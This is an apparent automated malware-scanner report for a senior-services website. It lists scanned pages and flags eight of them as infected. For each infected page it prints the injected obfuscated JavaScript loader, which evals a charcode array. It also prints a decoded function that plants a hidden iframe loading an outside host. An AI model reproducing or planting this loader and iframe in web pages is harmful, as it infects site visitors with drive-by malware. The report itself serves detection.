Malware Scanner report for 0000mps.webpreview.dsl.net:80

Malicious/Suspicious/Total urls checked: 8/0/15

8 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "0000mps.webpreview.dsl.net:80" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=0000mps.webpreview.dsl.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://0000mps.webpreview.dsl.net:80/	200 OK Content-Length: 24104 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h ... 2410 bytes are skipped ...-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss); Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i]... 10554 bytes are skipped ...;"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://lewgdooi.cz.cc/count15.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://lewgdooi.cz.cc/count15.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A F-Secure JS:Trojan.Iframe.A VIPRE Trojan-Clicker.HTML.IFrame (v) F-Prot JS/IFrame.HC.gen GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A
http://0000mps.webpreview.dsl.net:80/index.html	200 OK Content-Length: 24104 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h ... 2410 bytes are skipped ...-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss); Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i]... 10554 bytes are skipped ...;"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://lewgdooi.cz.cc/count15.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://lewgdooi.cz.cc/count15.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A F-Secure JS:Trojan.Iframe.A VIPRE Trojan-Clicker.HTML.IFrame (v) F-Prot JS/IFrame.HC.gen GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A
http://0000mps.webpreview.dsl.net:80/retirementapartments.html	200 OK Content-Length: 5594 Content-Type: text/html	clean
http://0000mps.webpreview.dsl.net:80/files/RateSheet.pdf	404 Not Found Content-Length: 693 Content-Type: text/html	clean
http://0000mps.webpreview.dsl.net:80/test404page.js	404 Not Found Content-Length: 693 Content-Type: text/html	clean
http://0000mps.webpreview.dsl.net:80/assistedliving.html	200 OK Content-Length: 20589 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h ... 2410 bytes are skipped ...-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss); Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i]... 10554 bytes are skipped ...;"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://lewgdooi.cz.cc/count15.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://lewgdooi.cz.cc/count15.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A F-Secure JS:Trojan.Iframe.A VIPRE Trojan-Clicker.HTML.IFrame (v) F-Prot JS/IFrame.HC.gen GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A
http://0000mps.webpreview.dsl.net:80/seniorservices.html	200 OK Content-Length: 21367 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h ... 2410 bytes are skipped ...-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss); Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i]... 10554 bytes are skipped ...;"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://lewgdooi.cz.cc/count15.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://lewgdooi.cz.cc/count15.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A F-Secure JS:Trojan.Iframe.A VIPRE Trojan-Clicker.HTML.IFrame (v) F-Prot JS/IFrame.HC.gen GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A
http://0000mps.webpreview.dsl.net:80/homehealthcare.html	200 OK Content-Length: 20706 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h ... 2410 bytes are skipped ...-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss); Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i]... 10554 bytes are skipped ...;"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://lewgdooi.cz.cc/count15.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://lewgdooi.cz.cc/count15.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A F-Secure JS:Trojan.Iframe.A VIPRE Trojan-Clicker.HTML.IFrame (v) F-Prot JS/IFrame.HC.gen GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A
http://0000mps.webpreview.dsl.net:80/downs.html	200 OK Content-Length: 21746 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h ... 2410 bytes are skipped ...-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss); Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i]... 10554 bytes are skipped ...;"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://lewgdooi.cz.cc/count15.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://lewgdooi.cz.cc/count15.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A F-Secure JS:Trojan.Iframe.A VIPRE Trojan-Clicker.HTML.IFrame (v) F-Prot JS/IFrame.HC.gen GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A
http://0000mps.webpreview.dsl.net:80/newsletter.html	200 OK Content-Length: 20111 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h ... 2410 bytes are skipped ...-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss); Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i]... 10554 bytes are skipped ...;"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://lewgdooi.cz.cc/count15.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://lewgdooi.cz.cc/count15.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A F-Secure JS:Trojan.Iframe.A VIPRE Trojan-Clicker.HTML.IFrame (v) F-Prot JS/IFrame.HC.gen GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A
http://0000mps.webpreview.dsl.net:80/files/AnnualReport2010.pdf	200 OK Content-Length: 301736 Content-Type: application/pdf	clean
http://0000mps.webpreview.dsl.net:80/files/Fall_2008_Newsletter.pdf	200 OK Content-Length: 300744 Content-Type: application/pdf	clean
http://0000mps.webpreview.dsl.net:80/file:///C\|/Documents and Settings/cessnac/Application Data/Macromedia/Dreamweaver MX 2004/Configuration/ServerConnections/grayfamilyreunion/Fireside_Fall07_WEB.pdf	404 Not Found Content-Length: 693 Content-Type: text/html	clean
http://0000mps.webpreview.dsl.net:80/file:///C\|/Documents and Settings/cessnac/Application Data/Macromedia/Dreamweaver MX 2004/Configuration/ServerConnections/grayfamilyreunion/Ingleside_ANNUAL_FINAL_lo.pdf	404 Not Found Content-Length: 693 Content-Type: text/html	clean
http://0000mps.webpreview.dsl.net:80/contactus.html	200 OK Content-Length: 20559 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h ... 2410 bytes are skipped ...-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss); Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i]... 10554 bytes are skipped ...;"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://lewgdooi.cz.cc/count15.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://lewgdooi.cz.cc/count15.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports: nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A F-Secure JS:Trojan.Iframe.A VIPRE Trojan-Clicker.HTML.IFrame (v) F-Prot JS/IFrame.HC.gen GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 0000mps.webpreview.dsl.net:80

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 05:48:07 GMT
Accept-Ranges: bytes
ETag: "15d6a0-5e28-4adaefb2d94a8"
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Length: 24104
Content-Type: text/html
Last-Modified: Sat, 24 Sep 2011 12:22:36 GMT

...24104 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: 0000mps.webpreview.dsl.net:80
Referer: http://www.google.com/search?q=0000mps.webpreview.dsl.net:80

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for 0000mps.webpreview.dsl.net:80

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools